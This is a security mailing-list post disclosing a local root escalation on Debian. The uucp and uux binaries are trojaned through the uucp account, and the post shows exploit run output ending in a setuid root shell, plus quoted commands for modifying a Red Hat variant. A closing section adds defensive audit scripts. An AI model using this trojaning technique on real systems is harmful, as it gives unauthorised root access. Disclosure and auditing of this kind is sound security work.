On Debian the uucp and uux binaries are owned by the uucp user. Additionally, /usr/lib/uucp is writable by the uucp user. This allows us to have some fun since we don't have that nasty makewhatis, but we can still get root by trojaning uucp and uux and hoping a root-owned process executes either one. Attached is an exploit based on zen's which trojans uucp and uux transparently to root or the user by allowing normal execution and hiding the true argv[0]. If root runs the command we create a suid shell in /var/tmp.

[core@devastator:~/tmp/debian-uucp]$ ./exp-erm.sh
o Checking if uucp is installed
o Creating exploit files
o Sent the commands : Sleeping 2 seconds.
o Cleaning up /var/tmp
o Trojaning uucp and uux
o Running the uucp shell. You should remove this when you're done.
sh-2.05$ ls -l .sushi
-rwxrwxr-x    1 core     core         5078 Jan 20 03:54 .sushi

Root haplessly runs uux or uucp:

root@devastator:~# uucp --help
Taylor UUCP 1.06.1, copyright (C) 1991, 92, 93, 94, 1995 Ian Lance Taylor
Usage: uucp [options] file1 [file2 ...] dest
 -c,--nocopy: Do not copy local files to spool directory
 -C,-p,--copy: Copy local files to spool directory (default)
 -d,--directories: Create necessary directories (default)
 -f,--nodirectories: Do not create directories (fail if they do not exist)
 -g,--grade grade: Set job grade (must be alphabetic)
 -m,--mail: Report status of copy by mail
 -n,--notify user: Report status of copy by mail to remote user
 -R,--recursive: Copy directories recursively
 -r,--nouucico: Do not start uucico daemon
 -s,--status file: Report completion status to file
 -j,--jobid: Report job id
 -W,--noexpand: Do not add current directory to remote filenames
 -t,--uuto: Emulate uuto
 -u,--usage name: Set user name
 -x,--debug debug: Set debugging level
 -I,--config file: Set configuration file to use
 -v,--version: Print version and exit
 --help: Print help and exit

Checking back in with the hacker we find a suid shell :)

sh-2.05$ ls -l .sushi
-rwsr-xr-x    1 root     root         5078 Jan 20 03:54 .sushi
sh-2.05$ ./.sushi
sh-2.05#

Tested on stable and unstable. This exploit is not specific to any certain arch.

Best Regards,
Charles 'core' Stevenson

zen-parse wrote:
>
> Problem: uucp patch from RedHat (possibly others) prevents
> original exploit, but not variations.
>
> Severity: Potential for local root on some distributions,
> uucp.uucp on others.
>
> https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=54466
>
> I had seen this report some time ago, and thought: "Good. They've got a
> bug report. That'll get it fixed. They'll check that before they release a
> new version, at least."
>
> They didn't.
>
> The patch does prevent the original exploit from working.
>
> However, a trivial patch to the exploit I posted makes it work again.
> local user -> uucp (via this problem) -> root (on some distributions, via
> /usr/sbin/makewhatis: '${PATH:0:1} (or similar) + redirection characters'
> issue.)
>
> $ cd redhat7.0-uucp-to-root
> $ sed s/--config/--confi/ < exp-erm.sh >tmp-exp-erm.sh
> $ mv tmp-exp-erm.sh exp-erm.sh
> $ ./runme
>
> and wait for /tmp/rootshell to appear.
>
> (Does anyone at RedHat actually read their bugzilla posts? Might it not be
> an idea to make anything flagged as security actually get looked at by
> someone? 2001-10-09 seems a long time for that to go unnoticed.)
>
> -- zen-parse
>
> --
> -------------------------------------------------------------------------
> 1) If this message was posted to a public forum by zen-parse@gmx.net, it
> may be redistributed without modification.
> 2) In any other case the contents of this message are confidential and not
> to be distributed in any form without express permission from the author.
> This document may contain Unclassified Controlled Nuclear Information.
Attachment:
debian-uucp.tar.gz
Description: GNU Zip compressed data
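The post turns on three conditions an administrator can check for: executables that root may run but that a lesser account owns or can write, a package directory (/usr/lib/uucp) writable by that account, and a setuid file left in /var/tmp. The audit helpers below are an added example, not part of the post or of the uucp package; the paths /usr/bin/uucp and /usr/bin/uux are assumed locations for the binaries the post names.

```shell
#!/bin/sh
# Added example (not from the original post): audit helpers for the
# conditions the Debian uucp trojaning post depends on. The --run paths
# below are assumptions about where a Debian system keeps these files.

# List executables under $1 that a lesser account could replace: either
# not owned by uid $2 (default 0, i.e. root) or writable by group/other.
# Only POSIX find predicates are used (-perm -mode), so this runs on any sh.
audit_trojanable_bins() {
    dir=$1
    trusted_uid=${2:-0}
    find "$dir" -type f \( -perm -0100 -o -perm -0010 -o -perm -0001 \) \
        \( ! -uid "$trusted_uid" -o -perm -0020 -o -perm -0002 \) 2>/dev/null
}

# List directories under $1 writable by group/other and lacking the sticky
# bit; a writable /usr/lib/uucp is what let the trojaned copies be installed.
audit_writable_dirs() {
    find "$1" -type d \( -perm -0020 -o -perm -0002 \) ! -perm -1000 2>/dev/null
}

# List setuid files under $1; the post's payload is a setuid shell in /var/tmp.
audit_setuid_files() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# Stand-alone usage: ./audit-uucp.sh --run
if [ "${1:-}" = "--run" ]; then
    for p in /usr/bin/uucp /usr/bin/uux /usr/lib/uucp; do   # assumed paths
        [ -e "$p" ] && audit_trojanable_bins "$p"
    done
    audit_writable_dirs /usr/lib/uucp
    audit_setuid_files /var/tmp
fi
```

Any path printed by the first two helpers is one a compromised uucp account could use to feed root a replaced binary; a non-empty result from the third is worth comparing against the package's file list before assuming it is legitimate.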